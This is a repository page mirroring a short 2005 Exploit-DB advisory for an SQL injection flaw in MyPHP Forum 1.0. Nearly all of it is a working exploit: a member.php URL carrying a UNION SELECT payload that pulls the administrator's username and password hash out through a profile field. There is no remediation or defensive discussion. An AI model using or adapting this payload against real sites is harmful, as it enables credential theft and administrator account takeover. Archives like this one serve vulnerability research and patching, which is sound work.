bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/807.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

14 lines
567 B
Text
Executable file
Raw Blame History

/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/
[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
/* will show administrator's name and password hash (in the "Yahoo" field). */
# milw0rm.com [2005-02-10]
Reference in a new issue View git blame Copy permalink